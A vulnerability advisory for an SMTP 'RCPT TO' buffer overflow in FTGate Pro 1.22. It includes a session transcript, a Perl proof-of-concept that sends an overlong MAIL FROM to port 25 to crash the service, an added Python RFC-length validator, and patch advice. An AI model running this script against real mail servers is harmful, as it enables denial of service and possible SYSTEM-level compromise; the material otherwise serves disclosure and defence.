Floosietek FTGate PRO SMTP RCPT TO Remote Buffer Overflow Vulnerability
Published: 2003-05-06
Updated: 2003-05-12
Affected systems:
Floosietek FTGatePro 1.22 (1328)
Unaffected systems:
Floosietek FTGatePro 1.22 (1330)
Description:
BUGTRAQ ID: 7508
FTGatePro is a shared-network proxy server that supports multiple protocols.
The FTGatePro mail service does not perform proper buffer bounds checking on an overlong argument to the SMTP 'RCPT TO' command. A remote attacker can exploit this to overflow a buffer in the service and possibly execute arbitrary code on the system with SYSTEM privileges.
When an attacker sends the FTGatePro mail service a message whose "RCPT TO" field contains an overlong string, a buffer overflow occurs; with a carefully constructed string, arbitrary code may be executed with SYSTEM privileges.
<*Source: Dennis Rand (DER@cowi.dk)
Link: http://www.infowarfare.dk/Advisories/iw-16-advisory.txt
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching. Use at your own risk!
220 win2k-serv ESMTP Server FTGate
HELO Foobar
250 win2k-serv
Mail From : admin@warlab.dk
250 <admin@warlab.dk> Sender Ok
Rcpt To: <aaaaa....[BUFFER about 2000 Bytes @ and 2000 bytes again ending with ".com"]
<connection closed>
#!/usr/bin/perl -w
##################
# FTGate Pro Mail Server v. 1.22 (1328) DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: der@infowarfare.dk
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the
# ESMTP Server FTGate, causing the service to stop responding for a short
# period, where we can actually overwrite the exception handler on the stack allowing
# a system compromise with code execution running as SYSTEM.
#
# Solution:
# Upgrade to FTGate Pro Mail Server v. 1.22 (HotFix 1330) or later
#
use strict;
use IO::Socket;

my $target = shift() || "warlab.dk";   # target host; defaults to the author's test host
my $port   = 25;
my $Buffer = "a" x 2400;               # overlong argument that triggers the overflow

my $sock = IO::Socket::INET->new(
    PeerAddr => $target,
    PeerPort => $port,
    Proto    => 'tcp'
) || die "could not connect: $!";

# Expect a 2xx greeting before speaking SMTP.
my $banner = <$sock>;
if ($banner !~ /^2.*/) {
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}

print $sock "HELO $target\r\n";
my $resp = <$sock>;
# Note: this PoC places the overlong string in MAIL FROM rather than in RCPT TO.
print $sock "MAIL FROM: $Buffer\@$Buffer.dk\r\n";
$resp = <$sock>;
print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";
close($sock);
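As an added, defender-side example (not part of the original advisory or the PoC above), the following Python check enforces the RFC 5321 length limits on MAIL FROM / RCPT TO arguments, the bounds check the vulnerable service lacked, and flags the overlong patterns shown in the session transcript and in the script. The sample session lines and the example.com address are constructed for the demonstration.

```python
import re

# RFC 5321 section 4.5.3.1 limits in octets; the check the vulnerable server lacked.
MAX_LOCAL_PART = 64
MAX_DOMAIN = 255
MAX_PATH = 256  # whole forward/reverse path, angle brackets included

_PATH_CMD = re.compile(r"^(MAIL FROM|RCPT TO)\s*:\s*(.*)$", re.IGNORECASE)


def check_path_command(line):
    """Validate one MAIL FROM / RCPT TO line.

    Returns (verb, problem); problem is None when the argument is within the
    RFC limits, and (None, None) is returned for commands that carry no path.
    """
    m = _PATH_CMD.match(line.rstrip("\r\n"))
    if not m:
        return None, None
    verb, arg = m.group(1).upper(), m.group(2).strip()
    # Length is checked before any parsing, so an oversized argument is
    # rejected before it could ever be copied into a fixed-size buffer.
    if len(arg.encode("utf-8")) > MAX_PATH:
        return verb, "path length %d exceeds %d octets" % (len(arg), MAX_PATH)
    path = arg[1:-1] if arg.startswith("<") and arg.endswith(">") else arg
    if path == "":  # "<>" null reverse-path is legal for MAIL FROM
        return verb, None
    local, sep, domain = path.rpartition("@")
    if not sep:
        return verb, "address has no @"
    if len(local) > MAX_LOCAL_PART:
        return verb, "local-part length %d exceeds %d" % (len(local), MAX_LOCAL_PART)
    if len(domain) > MAX_DOMAIN:
        return verb, "domain length %d exceeds %d" % (len(domain), MAX_DOMAIN)
    return verb, None


def scan_session(lines):
    """Return [(line_no, verb, problem)] for every command that fails the check."""
    findings = []
    for n, line in enumerate(lines, 1):
        verb, problem = check_path_command(line)
        if problem is not None:
            findings.append((n, verb, problem))
    return findings


# Constructed client-side lines modelled on the advisory's transcript and PoC.
SAMPLE_SESSION = [
    "HELO Foobar",
    "MAIL FROM: <admin@warlab.dk>",
    "RCPT TO: <user@example.com>",
    "RCPT TO: <" + "a" * 2000 + "@" + "a" * 2000 + ".com",  # transcript pattern
    "MAIL FROM: " + "a" * 2400 + "@" + "a" * 2400 + ".dk",   # PoC script pattern
]
```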
Recommendations:
Vendor patch:
Floosietek
----------
The vendor has released a hotfix for this issue. Download and install HOTFIX 1330 from the vendor's home page to upgrade to FTGate Pro Mail Server v. 1.22:
http://www.ftgate.com/